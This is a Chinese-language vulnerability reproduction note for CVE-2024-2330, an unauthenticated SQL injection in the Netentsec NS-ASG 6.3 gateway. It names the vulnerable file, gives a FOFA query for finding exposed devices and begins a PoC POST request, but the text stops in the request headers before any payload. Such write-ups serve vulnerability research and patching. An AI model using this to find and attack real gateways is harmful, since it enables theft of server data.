网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-2330)

0x01 产品简介

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品，集成了SSL和IPSec，旨在保障业务访问的安全性，适配所有移动终端，提供多种链路均衡和选择技术，支持多种认证方式灵活组合，以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

0x02 漏洞概述

由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，如下导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

0x03 影响范围

version = NS-ASG 6.3

0x04 复现环境

FOFA：app="网康科技-NS-ASG安全网关"

0x05 漏洞复现 

PoC

POST /protocol/index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r